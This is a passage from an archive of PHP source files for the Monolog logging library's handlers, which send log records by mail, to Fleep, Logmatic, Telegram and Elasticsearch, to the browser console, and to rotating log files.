$formatter; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/MailHandler.php000064400000004445147600400120021660 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\HtmlFormatter; /** * Base class for all mail handlers * * @author Gyula Sallai * * @phpstan-import-type Record from \Monolog\Logger */ abstract class MailHandler extends AbstractProcessingHandler { /** * {@inheritDoc} */ public function handleBatch(array $records): void { $messages = []; foreach ($records as $record) { if ($record['level'] < $this->level) { continue; } /** @var Record $message */ $message = $this->processRecord($record); $messages[] = $message; } if (!empty($messages)) { $this->send((string) $this->getFormatter()->formatBatch($messages), $messages); } } /** * Send a mail with the given content * * @param string $content formatted email body to be sent * @param array $records the array of log records that formed this content * * @phpstan-param Record[] $records */ abstract protected function send(string $content, array $records): void; /** * {@inheritDoc} */ protected function write(array $record): void { $this->send((string) $record['formatted'], [$record]); } /** * @phpstan-param non-empty-array $records * @phpstan-return Record */ protected function getHighestRecord(array $records): array { $highestRecord = null; foreach ($records as $record) { if ($highestRecord === null || $highestRecord['level'] < $record['level']) { $highestRecord = $record; } } return $highestRecord; } protected function isHtmlBody(string $body): bool { return ($body[0] ?? null) === '<'; } /** * Gets the default formatter. * * @return FormatterInterface */ protected function getDefaultFormatter(): FormatterInterface { return new HtmlFormatter(); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/FleepHookHandler.php000064400000007011147600400120022642 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\LineFormatter; use Monolog\Logger; /** * Sends logs to Fleep.io using Webhook integrations * * You'll need a Fleep.io account to use this handler. * * @see https://fleep.io/integrations/webhooks/ Fleep Webhooks Documentation * @author Ando Roots * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class FleepHookHandler extends SocketHandler { protected const FLEEP_HOST = 'fleep.io'; protected const FLEEP_HOOK_URI = '/hook/'; /** * @var string Webhook token (specifies the conversation where logs are sent) */ protected $token; /** * Construct a new Fleep.io Handler. * * For instructions on how to create a new web hook in your conversations * see https://fleep.io/integrations/webhooks/ * * @param string $token Webhook token * @throws MissingExtensionException */ public function __construct( string $token, $level = Logger::DEBUG, bool $bubble = true, bool $persistent = false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null ) { if (!extension_loaded('openssl')) { throw new MissingExtensionException('The OpenSSL PHP extension is required to use the FleepHookHandler'); } $this->token = $token; $connectionString = 'ssl://' . static::FLEEP_HOST . ':443'; parent::__construct( $connectionString, $level, $bubble, $persistent, $timeout, $writingTimeout, $connectionTimeout, $chunkSize ); } /** * Returns the default formatter to use with this handler * * Overloaded to remove empty context and extra arrays from the end of the log message. * * @return LineFormatter */ protected function getDefaultFormatter(): FormatterInterface { return new LineFormatter(null, null, true, true); } /** * Handles a log record */ public function write(array $record): void { parent::write($record); $this->closeSocket(); } /** * {@inheritDoc} */ protected function generateDataStream(array $record): string { $content = $this->buildContent($record); return $this->buildHeader($content) . $content; } /** * Builds the header of the API Call */ private function buildHeader(string $content): string { $header = "POST " . static::FLEEP_HOOK_URI . $this->token . " HTTP/1.1\r\n"; $header .= "Host: " . static::FLEEP_HOST . "\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header .= "Content-Length: " . strlen($content) . "\r\n"; $header .= "\r\n"; return $header; } /** * Builds the body of API call * * @phpstan-param FormattedRecord $record */ private function buildContent(array $record): string { $dataArray = [ 'message' => $record['formatted'], ]; return http_build_query($dataArray); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/LogmaticHandler.php000064400000005234147600400120022532 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\LogmaticFormatter; /** * @author Julien Breux */ class LogmaticHandler extends SocketHandler { /** * @var string */ private $logToken; /** * @var string */ private $hostname; /** * @var string */ private $appname; /** * @param string $token Log token supplied by Logmatic. * @param string $hostname Host name supplied by Logmatic. * @param string $appname Application name supplied by Logmatic. * @param bool $useSSL Whether or not SSL encryption should be used. * * @throws MissingExtensionException If SSL encryption is set to true and OpenSSL is missing */ public function __construct( string $token, string $hostname = '', string $appname = '', bool $useSSL = true, $level = Logger::DEBUG, bool $bubble = true, bool $persistent = false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null ) { if ($useSSL && !extension_loaded('openssl')) { throw new MissingExtensionException('The OpenSSL PHP extension is required to use SSL encrypted connection for LogmaticHandler'); } $endpoint = $useSSL ? 'ssl://api.logmatic.io:10515' : 'api.logmatic.io:10514'; $endpoint .= '/v1/'; parent::__construct( $endpoint, $level, $bubble, $persistent, $timeout, $writingTimeout, $connectionTimeout, $chunkSize ); $this->logToken = $token; $this->hostname = $hostname; $this->appname = $appname; } /** * {@inheritDoc} */ protected function generateDataStream(array $record): string { return $this->logToken . ' ' . $record['formatted']; } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { $formatter = new LogmaticFormatter(); if (!empty($this->hostname)) { $formatter->setHostname($this->hostname); } if (!empty($this->appname)) { $formatter->setAppname($this->appname); } return $formatter; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/BrowserConsoleHandler.php000064400000022435147600400120023743 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\LineFormatter; use Monolog\Utils; use Monolog\Logger; use function count; use function headers_list; use function stripos; use function trigger_error; use const E_USER_DEPRECATED; /** * Handler sending logs to browser's javascript console with no browser extension required * * @author Olivier Poitrey * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class BrowserConsoleHandler extends AbstractProcessingHandler { /** @var bool */ protected static $initialized = false; /** @var FormattedRecord[] */ protected static $records = []; protected const FORMAT_HTML = 'html'; protected const FORMAT_JS = 'js'; protected const FORMAT_UNKNOWN = 'unknown'; /** * {@inheritDoc} * * Formatted output may contain some formatting markers to be transferred to `console.log` using the %c format. * * Example of formatted string: * * You can do [[blue text]]{color: blue} or [[green background]]{background-color: green; color: white} */ protected function getDefaultFormatter(): FormatterInterface { return new LineFormatter('[[%channel%]]{macro: autolabel} [[%level_name%]]{font-weight: bold} %message%'); } /** * {@inheritDoc} */ protected function write(array $record): void { // Accumulate records static::$records[] = $record; // Register shutdown handler if not already done if (!static::$initialized) { static::$initialized = true; $this->registerShutdownFunction(); } } /** * Convert records to javascript console commands and send it to the browser. * This method is automatically called on PHP shutdown if output is HTML or Javascript. */ public static function send(): void { $format = static::getResponseFormat(); if ($format === self::FORMAT_UNKNOWN) { return; } if (count(static::$records)) { if ($format === self::FORMAT_HTML) { static::writeOutput(''); } elseif ($format === self::FORMAT_JS) { static::writeOutput(static::generateScript()); } static::resetStatic(); } } public function close(): void { self::resetStatic(); } public function reset() { parent::reset(); self::resetStatic(); } /** * Forget all logged records */ public static function resetStatic(): void { static::$records = []; } /** * Wrapper for register_shutdown_function to allow overriding */ protected function registerShutdownFunction(): void { if (PHP_SAPI !== 'cli') { register_shutdown_function(['Monolog\Handler\BrowserConsoleHandler', 'send']); } } /** * Wrapper for echo to allow overriding */ protected static function writeOutput(string $str): void { echo $str; } /** * Checks the format of the response * * If Content-Type is set to application/javascript or text/javascript -> js * If Content-Type is set to text/html, or is unset -> html * If Content-Type is anything else -> unknown * * @return string One of 'js', 'html' or 'unknown' * @phpstan-return self::FORMAT_* */ protected static function getResponseFormat(): string { // Check content type foreach (headers_list() as $header) { if (stripos($header, 'content-type:') === 0) { return static::getResponseFormatFromContentType($header); } } return self::FORMAT_HTML; } /** * @return string One of 'js', 'html' or 'unknown' * @phpstan-return self::FORMAT_* */ protected static function getResponseFormatFromContentType(string $contentType): string { // This handler only works with HTML and javascript outputs // text/javascript is obsolete in favour of application/javascript, but still used if (stripos($contentType, 'application/javascript') !== false || stripos($contentType, 'text/javascript') !== false) { return self::FORMAT_JS; } if (stripos($contentType, 'text/html') !== false) { return self::FORMAT_HTML; } return self::FORMAT_UNKNOWN; } private static function generateScript(): string { $script = []; foreach (static::$records as $record) { $context = static::dump('Context', $record['context']); $extra = static::dump('Extra', $record['extra']); if (empty($context) && empty($extra)) { $script[] = static::call_array(static::getConsoleMethodForLevel($record['level']), static::handleStyles($record['formatted'])); } else { $script = array_merge( $script, [static::call_array('groupCollapsed', static::handleStyles($record['formatted']))], $context, $extra, [static::call('groupEnd')] ); } } return "(function (c) {if (c && c.groupCollapsed) {\n" . implode("\n", $script) . "\n}})(console);"; } private static function getConsoleMethodForLevel(int $level): string { return [ Logger::DEBUG => 'debug', Logger::INFO => 'info', Logger::NOTICE => 'info', Logger::WARNING => 'warn', Logger::ERROR => 'error', Logger::CRITICAL => 'error', Logger::ALERT => 'error', Logger::EMERGENCY => 'error', ][$level] ?? 'log'; } /** * @return string[] */ private static function handleStyles(string $formatted): array { $args = []; $format = '%c' . $formatted; preg_match_all('/\[\[(.*?)\]\]\{([^}]*)\}/s', $format, $matches, PREG_OFFSET_CAPTURE | PREG_SET_ORDER); foreach (array_reverse($matches) as $match) { $args[] = '"font-weight: normal"'; $args[] = static::quote(static::handleCustomStyles($match[2][0], $match[1][0])); $pos = $match[0][1]; $format = Utils::substr($format, 0, $pos) . '%c' . $match[1][0] . '%c' . Utils::substr($format, $pos + strlen($match[0][0])); } $args[] = static::quote('font-weight: normal'); $args[] = static::quote($format); return array_reverse($args); } private static function handleCustomStyles(string $style, string $string): string { static $colors = ['blue', 'green', 'red', 'magenta', 'orange', 'black', 'grey']; static $labels = []; $style = preg_replace_callback('/macro\s*:(.*?)(?:;|$)/', function (array $m) use ($string, &$colors, &$labels) { if (trim($m[1]) === 'autolabel') { // Format the string as a label with consistent auto assigned background color if (!isset($labels[$string])) { $labels[$string] = $colors[count($labels) % count($colors)]; } $color = $labels[$string]; return "background-color: $color; color: white; border-radius: 3px; padding: 0 2px 0 2px"; } return $m[1]; }, $style); if (null === $style) { $pcreErrorCode = preg_last_error(); throw new \RuntimeException('Failed to run preg_replace_callback: ' . $pcreErrorCode . ' / ' . Utils::pcreLastErrorMessage($pcreErrorCode)); } return $style; } /** * @param mixed[] $dict * @return mixed[] */ private static function dump(string $title, array $dict): array { $script = []; $dict = array_filter($dict); if (empty($dict)) { return $script; } $script[] = static::call('log', static::quote('%c%s'), static::quote('font-weight: bold'), static::quote($title)); foreach ($dict as $key => $value) { $value = json_encode($value); if (empty($value)) { $value = static::quote(''); } $script[] = static::call('log', static::quote('%s: %o'), static::quote((string) $key), $value); } return $script; } private static function quote(string $arg): string { return '"' . addcslashes($arg, "\"\n\\") . '"'; } /** * @param mixed $args */ private static function call(...$args): string { $method = array_shift($args); if (!is_string($method)) { throw new \UnexpectedValueException('Expected the first arg to be a string, got: '.var_export($method, true)); } return static::call_array($method, $args); } /** * @param mixed[] $args */ private static function call_array(string $method, array $args): string { return 'c.' . $method . '(' . implode(', ', $args) . ');'; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/FormattableHandlerTrait.php000064400000002401147600400120024230 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\LineFormatter; /** * Helper trait for implementing FormattableInterface * * @author Jordi Boggiano */ trait FormattableHandlerTrait { /** * @var ?FormatterInterface */ protected $formatter; /** * {@inheritDoc} */ public function setFormatter(FormatterInterface $formatter): HandlerInterface { $this->formatter = $formatter; return $this; } /** * {@inheritDoc} */ public function getFormatter(): FormatterInterface { if (!$this->formatter) { $this->formatter = $this->getDefaultFormatter(); } return $this->formatter; } /** * Gets the default formatter. * * Overwrite this if the LineFormatter is not a good default for your handler. */ protected function getDefaultFormatter(): FormatterInterface { return new LineFormatter(); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/TelegramBotHandler.php000064400000020336147600400120023200 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use RuntimeException; use Monolog\Logger; use Monolog\Utils; /** * Handler send logs to Telegram using Telegram Bot API. * * How to use: * 1) Create telegram bot with https://telegram.me/BotFather * 2) Create a telegram channel where logs will be recorded. * 3) Add created bot from step 1 to the created channel from step 2. * * Use telegram bot API key from step 1 and channel name with '@' prefix from step 2 to create instance of TelegramBotHandler * * @link https://core.telegram.org/bots/api * * @author Mazur Alexandr * * @phpstan-import-type Record from \Monolog\Logger */ class TelegramBotHandler extends AbstractProcessingHandler { private const BOT_API = 'https://api.telegram.org/bot'; /** * The available values of parseMode according to the Telegram api documentation */ private const AVAILABLE_PARSE_MODES = [ 'HTML', 'MarkdownV2', 'Markdown', // legacy mode without underline and strikethrough, use MarkdownV2 instead ]; /** * The maximum number of characters allowed in a message according to the Telegram api documentation */ private const MAX_MESSAGE_LENGTH = 4096; /** * Telegram bot access token provided by BotFather. * Create telegram bot with https://telegram.me/BotFather and use access token from it. * @var string */ private $apiKey; /** * Telegram channel name. * Since to start with '@' symbol as prefix. * @var string */ private $channel; /** * The kind of formatting that is used for the message. * See available options at https://core.telegram.org/bots/api#formatting-options * or in AVAILABLE_PARSE_MODES * @var ?string */ private $parseMode; /** * Disables link previews for links in the message. * @var ?bool */ private $disableWebPagePreview; /** * Sends the message silently. Users will receive a notification with no sound. * @var ?bool */ private $disableNotification; /** * True - split a message longer than MAX_MESSAGE_LENGTH into parts and send in multiple messages. * False - truncates a message that is too long. * @var bool */ private $splitLongMessages; /** * Adds 1-second delay between sending a split message (according to Telegram API to avoid 429 Too Many Requests). * @var bool */ private $delayBetweenMessages; /** * @param string $apiKey Telegram bot access token provided by BotFather * @param string $channel Telegram channel name * @param bool $splitLongMessages Split a message longer than MAX_MESSAGE_LENGTH into parts and send in multiple messages * @param bool $delayBetweenMessages Adds delay between sending a split message according to Telegram API * @throws MissingExtensionException */ public function __construct( string $apiKey, string $channel, $level = Logger::DEBUG, bool $bubble = true, string $parseMode = null, bool $disableWebPagePreview = null, bool $disableNotification = null, bool $splitLongMessages = false, bool $delayBetweenMessages = false ) { if (!extension_loaded('curl')) { throw new MissingExtensionException('The curl extension is needed to use the TelegramBotHandler'); } parent::__construct($level, $bubble); $this->apiKey = $apiKey; $this->channel = $channel; $this->setParseMode($parseMode); $this->disableWebPagePreview($disableWebPagePreview); $this->disableNotification($disableNotification); $this->splitLongMessages($splitLongMessages); $this->delayBetweenMessages($delayBetweenMessages); } public function setParseMode(string $parseMode = null): self { if ($parseMode !== null && !in_array($parseMode, self::AVAILABLE_PARSE_MODES)) { throw new \InvalidArgumentException('Unknown parseMode, use one of these: ' . implode(', ', self::AVAILABLE_PARSE_MODES) . '.'); } $this->parseMode = $parseMode; return $this; } public function disableWebPagePreview(bool $disableWebPagePreview = null): self { $this->disableWebPagePreview = $disableWebPagePreview; return $this; } public function disableNotification(bool $disableNotification = null): self { $this->disableNotification = $disableNotification; return $this; } /** * True - split a message longer than MAX_MESSAGE_LENGTH into parts and send in multiple messages. * False - truncates a message that is too long. * @param bool $splitLongMessages * @return $this */ public function splitLongMessages(bool $splitLongMessages = false): self { $this->splitLongMessages = $splitLongMessages; return $this; } /** * Adds 1-second delay between sending a split message (according to Telegram API to avoid 429 Too Many Requests). * @param bool $delayBetweenMessages * @return $this */ public function delayBetweenMessages(bool $delayBetweenMessages = false): self { $this->delayBetweenMessages = $delayBetweenMessages; return $this; } /** * {@inheritDoc} */ public function handleBatch(array $records): void { /** @var Record[] $messages */ $messages = []; foreach ($records as $record) { if (!$this->isHandling($record)) { continue; } if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } $messages[] = $record; } if (!empty($messages)) { $this->send((string)$this->getFormatter()->formatBatch($messages)); } } /** * @inheritDoc */ protected function write(array $record): void { $this->send($record['formatted']); } /** * Send request to @link https://api.telegram.org/bot on SendMessage action. * @param string $message */ protected function send(string $message): void { $messages = $this->handleMessageLength($message); foreach ($messages as $key => $msg) { if ($this->delayBetweenMessages && $key > 0) { sleep(1); } $this->sendCurl($msg); } } protected function sendCurl(string $message): void { $ch = curl_init(); $url = self::BOT_API . $this->apiKey . '/SendMessage'; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'text' => $message, 'chat_id' => $this->channel, 'parse_mode' => $this->parseMode, 'disable_web_page_preview' => $this->disableWebPagePreview, 'disable_notification' => $this->disableNotification, ])); $result = Curl\Util::execute($ch); if (!is_string($result)) { throw new RuntimeException('Telegram API error. Description: No response'); } $result = json_decode($result, true); if ($result['ok'] === false) { throw new RuntimeException('Telegram API error. Description: ' . $result['description']); } } /** * Handle a message that is too long: truncates or splits into several * @param string $message * @return string[] */ private function handleMessageLength(string $message): array { $truncatedMarker = ' (...truncated)'; if (!$this->splitLongMessages && strlen($message) > self::MAX_MESSAGE_LENGTH) { return [Utils::substr($message, 0, self::MAX_MESSAGE_LENGTH - strlen($truncatedMarker)) . $truncatedMarker]; } return str_split($message, self::MAX_MESSAGE_LENGTH); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/NoopHandler.php000064400000001560147600400120021704 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; /** * No-op * * This handler handles anything, but does nothing, and does not stop bubbling to the rest of the stack. * This can be used for testing, or to disable a handler when overriding a configuration without * influencing the rest of the stack. * * @author Roel Harbers */ class NoopHandler extends Handler { /** * {@inheritDoc} */ public function isHandling(array $record): bool { return true; } /** * {@inheritDoc} */ public function handle(array $record): bool { return false; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/ElasticsearchHandler.php000064400000014557147600400120023555 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Elastic\Elasticsearch\Response\Elasticsearch; use Throwable; use RuntimeException; use Monolog\Logger; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\ElasticsearchFormatter; use InvalidArgumentException; use Elasticsearch\Common\Exceptions\RuntimeException as ElasticsearchRuntimeException; use Elasticsearch\Client; use Elastic\Elasticsearch\Exception\InvalidArgumentException as ElasticInvalidArgumentException; use Elastic\Elasticsearch\Client as Client8; /** * Elasticsearch handler * * @link https://www.elastic.co/guide/en/elasticsearch/client/php-api/current/index.html * * Simple usage example: * * $client = \Elasticsearch\ClientBuilder::create() * ->setHosts($hosts) * ->build(); * * $options = array( * 'index' => 'elastic_index_name', * 'type' => 'elastic_doc_type', * ); * $handler = new ElasticsearchHandler($client, $options); * $log = new Logger('application'); * $log->pushHandler($handler); * * @author Avtandil Kikabidze */ class ElasticsearchHandler extends AbstractProcessingHandler { /** * @var Client|Client8 */ protected $client; /** * @var mixed[] Handler config options */ protected $options = []; /** * @var bool */ private $needsType; /** * @param Client|Client8 $client Elasticsearch Client object * @param mixed[] $options Handler configuration */ public function __construct($client, array $options = [], $level = Logger::DEBUG, bool $bubble = true) { if (!$client instanceof Client && !$client instanceof Client8) { throw new \TypeError('Elasticsearch\Client or Elastic\Elasticsearch\Client instance required'); } parent::__construct($level, $bubble); $this->client = $client; $this->options = array_merge( [ 'index' => 'monolog', // Elastic index name 'type' => '_doc', // Elastic document type 'ignore_error' => false, // Suppress Elasticsearch exceptions ], $options ); if ($client instanceof Client8 || $client::VERSION[0] === '7') { $this->needsType = false; // force the type to _doc for ES8/ES7 $this->options['type'] = '_doc'; } else { $this->needsType = true; } } /** * {@inheritDoc} */ protected function write(array $record): void { $this->bulkSend([$record['formatted']]); } /** * {@inheritDoc} */ public function setFormatter(FormatterInterface $formatter): HandlerInterface { if ($formatter instanceof ElasticsearchFormatter) { return parent::setFormatter($formatter); } throw new InvalidArgumentException('ElasticsearchHandler is only compatible with ElasticsearchFormatter'); } /** * Getter options * * @return mixed[] */ public function getOptions(): array { return $this->options; } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new ElasticsearchFormatter($this->options['index'], $this->options['type']); } /** * {@inheritDoc} */ public function handleBatch(array $records): void { $documents = $this->getFormatter()->formatBatch($records); $this->bulkSend($documents); } /** * Use Elasticsearch bulk API to send list of documents * * @param array[] $records Records + _index/_type keys * @throws \RuntimeException */ protected function bulkSend(array $records): void { try { $params = [ 'body' => [], ]; foreach ($records as $record) { $params['body'][] = [ 'index' => $this->needsType ? [ '_index' => $record['_index'], '_type' => $record['_type'], ] : [ '_index' => $record['_index'], ], ]; unset($record['_index'], $record['_type']); $params['body'][] = $record; } /** @var Elasticsearch */ $responses = $this->client->bulk($params); if ($responses['errors'] === true) { throw $this->createExceptionFromResponses($responses); } } catch (Throwable $e) { if (! $this->options['ignore_error']) { throw new RuntimeException('Error sending messages to Elasticsearch', 0, $e); } } } /** * Creates elasticsearch exception from responses array * * Only the first error is converted into an exception. * * @param mixed[]|Elasticsearch $responses returned by $this->client->bulk() */ protected function createExceptionFromResponses($responses): Throwable { foreach ($responses['items'] ?? [] as $item) { if (isset($item['index']['error'])) { return $this->createExceptionFromError($item['index']['error']); } } if (class_exists(ElasticInvalidArgumentException::class)) { return new ElasticInvalidArgumentException('Elasticsearch failed to index one or more records.'); } return new ElasticsearchRuntimeException('Elasticsearch failed to index one or more records.'); } /** * Creates elasticsearch exception from error array * * @param mixed[] $error */ protected function createExceptionFromError(array $error): Throwable { $previous = isset($error['caused_by']) ? $this->createExceptionFromError($error['caused_by']) : null; if (class_exists(ElasticInvalidArgumentException::class)) { return new ElasticInvalidArgumentException($error['type'] . ': ' . $error['reason'], 0, $previous); } return new ElasticsearchRuntimeException($error['type'] . ': ' . $error['reason'], 0, $previous); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/HandlerWrapper.php000064400000006436147600400120022420 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\ResettableInterface; use Monolog\Formatter\FormatterInterface; /** * This simple wrapper class can be used to extend handlers functionality. * * Example: A custom filtering that can be applied to any handler. * * Inherit from this class and override handle() like this: * * public function handle(array $record) * { * if ($record meets certain conditions) { * return false; * } * return $this->handler->handle($record); * } * * @author Alexey Karapetov */ class HandlerWrapper implements HandlerInterface, ProcessableHandlerInterface, FormattableHandlerInterface, ResettableInterface { /** * @var HandlerInterface */ protected $handler; public function __construct(HandlerInterface $handler) { $this->handler = $handler; } /** * {@inheritDoc} */ public function isHandling(array $record): bool { return $this->handler->isHandling($record); } /** * {@inheritDoc} */ public function handle(array $record): bool { return $this->handler->handle($record); } /** * {@inheritDoc} */ public function handleBatch(array $records): void { $this->handler->handleBatch($records); } /** * {@inheritDoc} */ public function close(): void { $this->handler->close(); } /** * {@inheritDoc} */ public function pushProcessor(callable $callback): HandlerInterface { if ($this->handler instanceof ProcessableHandlerInterface) { $this->handler->pushProcessor($callback); return $this; } throw new \LogicException('The wrapped handler does not implement ' . ProcessableHandlerInterface::class); } /** * {@inheritDoc} */ public function popProcessor(): callable { if ($this->handler instanceof ProcessableHandlerInterface) { return $this->handler->popProcessor(); } throw new \LogicException('The wrapped handler does not implement ' . ProcessableHandlerInterface::class); } /** * {@inheritDoc} */ public function setFormatter(FormatterInterface $formatter): HandlerInterface { if ($this->handler instanceof FormattableHandlerInterface) { $this->handler->setFormatter($formatter); return $this; } throw new \LogicException('The wrapped handler does not implement ' . FormattableHandlerInterface::class); } /** * {@inheritDoc} */ public function getFormatter(): FormatterInterface { if ($this->handler instanceof FormattableHandlerInterface) { return $this->handler->getFormatter(); } throw new \LogicException('The wrapped handler does not implement ' . FormattableHandlerInterface::class); } public function reset() { if ($this->handler instanceof ResettableInterface) { $this->handler->reset(); } } } google-api/vendor/monolog/monolog/src/Monolog/Handler/RotatingFileHandler.php000064400000014365147600400120023367 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use InvalidArgumentException; use Monolog\Logger; use Monolog\Utils; /** * Stores logs to files that are rotated every day and a limited number of files are kept. * * This rotation is only intended to be used as a workaround. Using logrotate to * handle the rotation is strongly encouraged when you can use it. * * @author Christophe Coevoet * @author Jordi Boggiano */ class RotatingFileHandler extends StreamHandler { public const FILE_PER_DAY = 'Y-m-d'; public const FILE_PER_MONTH = 'Y-m'; public const FILE_PER_YEAR = 'Y'; /** @var string */ protected $filename; /** @var int */ protected $maxFiles; /** @var bool */ protected $mustRotate; /** @var \DateTimeImmutable */ protected $nextRotation; /** @var string */ protected $filenameFormat; /** @var string */ protected $dateFormat; /** * @param string $filename * @param int $maxFiles The maximal amount of files to keep (0 means unlimited) * @param int|null $filePermission Optional file permissions (default (0644) are only for owner read/write) * @param bool $useLocking Try to lock log file before doing any writes */ public function __construct(string $filename, int $maxFiles = 0, $level = Logger::DEBUG, bool $bubble = true, ?int $filePermission = null, bool $useLocking = false) { $this->filename = Utils::canonicalizePath($filename); $this->maxFiles = $maxFiles; $this->nextRotation = new \DateTimeImmutable('tomorrow'); $this->filenameFormat = '{filename}-{date}'; $this->dateFormat = static::FILE_PER_DAY; parent::__construct($this->getTimedFilename(), $level, $bubble, $filePermission, $useLocking); } /** * {@inheritDoc} */ public function close(): void { parent::close(); if (true === $this->mustRotate) { $this->rotate(); } } /** * {@inheritDoc} */ public function reset() { parent::reset(); if (true === $this->mustRotate) { $this->rotate(); } } public function setFilenameFormat(string $filenameFormat, string $dateFormat): self { if (!preg_match('{^[Yy](([/_.-]?m)([/_.-]?d)?)?$}', $dateFormat)) { throw new InvalidArgumentException( 'Invalid date format - format must be one of '. 'RotatingFileHandler::FILE_PER_DAY ("Y-m-d"), RotatingFileHandler::FILE_PER_MONTH ("Y-m") '. 'or RotatingFileHandler::FILE_PER_YEAR ("Y"), or you can set one of the '. 'date formats using slashes, underscores and/or dots instead of dashes.' ); } if (substr_count($filenameFormat, '{date}') === 0) { throw new InvalidArgumentException( 'Invalid filename format - format must contain at least `{date}`, because otherwise rotating is impossible.' ); } $this->filenameFormat = $filenameFormat; $this->dateFormat = $dateFormat; $this->url = $this->getTimedFilename(); $this->close(); return $this; } /** * {@inheritDoc} */ protected function write(array $record): void { // on the first record written, if the log is new, we should rotate (once per day) if (null === $this->mustRotate) { $this->mustRotate = null === $this->url || !file_exists($this->url); } if ($this->nextRotation <= $record['datetime']) { $this->mustRotate = true; $this->close(); } parent::write($record); } /** * Rotates the files. */ protected function rotate(): void { // update filename $this->url = $this->getTimedFilename(); $this->nextRotation = new \DateTimeImmutable('tomorrow'); // skip GC of old logs if files are unlimited if (0 === $this->maxFiles) { return; } $logFiles = glob($this->getGlobPattern()); if (false === $logFiles) { // failed to glob return; } if ($this->maxFiles >= count($logFiles)) { // no files to remove return; } // Sorting the files by name to remove the older ones usort($logFiles, function ($a, $b) { return strcmp($b, $a); }); foreach (array_slice($logFiles, $this->maxFiles) as $file) { if (is_writable($file)) { // suppress errors here as unlink() might fail if two processes // are cleaning up/rotating at the same time set_error_handler(function (int $errno, string $errstr, string $errfile, int $errline): bool { return false; }); unlink($file); restore_error_handler(); } } $this->mustRotate = false; } protected function getTimedFilename(): string { $fileInfo = pathinfo($this->filename); $timedFilename = str_replace( ['{filename}', '{date}'], [$fileInfo['filename'], date($this->dateFormat)], $fileInfo['dirname'] . '/' . $this->filenameFormat ); if (isset($fileInfo['extension'])) { $timedFilename .= '.'.$fileInfo['extension']; } return $timedFilename; } protected function getGlobPattern(): string { $fileInfo = pathinfo($this->filename); $glob = str_replace( ['{filename}', '{date}'], [$fileInfo['filename'], str_replace( ['Y', 'y', 'm', 'd'], ['[0-9][0-9][0-9][0-9]', '[0-9][0-9]', '[0-9][0-9]', '[0-9][0-9]'], $this->dateFormat) ], $fileInfo['dirname'] . '/' . $this->filenameFormat ); if (isset($fileInfo['extension'])) { $glob .= '.'.$fileInfo['extension']; } return $glob; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/AbstractProcessingHandler.php000064400000003572147600400120024576 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; /** * Base Handler class providing the Handler structure, including processors and formatters * * Classes extending it should (in most cases) only implement write($record) * * @author Jordi Boggiano * @author Christophe Coevoet * * @phpstan-import-type LevelName from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type Record from \Monolog\Logger * @phpstan-type FormattedRecord array{message: string, context: mixed[], level: Level, level_name: LevelName, channel: string, datetime: \DateTimeImmutable, extra: mixed[], formatted: mixed} */ abstract class AbstractProcessingHandler extends AbstractHandler implements ProcessableHandlerInterface, FormattableHandlerInterface { use ProcessableHandlerTrait; use FormattableHandlerTrait; /** * {@inheritDoc} */ public function handle(array $record): bool { if (!$this->isHandling($record)) { return false; } if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } $record['formatted'] = $this->getFormatter()->format($record); $this->write($record); return false === $this->bubble; } /** * Writes the record down to the log of the implementing handler * * @phpstan-param FormattedRecord $record */ abstract protected function write(array $record): void; /** * @return void */ public function reset() { parent::reset(); $this->resetProcessors(); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/OverflowHandler.php000064400000010665147600400120022602 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Formatter\FormatterInterface; /** * Handler to only pass log messages when a certain threshold of number of messages is reached. * * This can be useful in cases of processing a batch of data, but you're for example only interested * in case it fails catastrophically instead of a warning for 1 or 2 events. Worse things can happen, right? 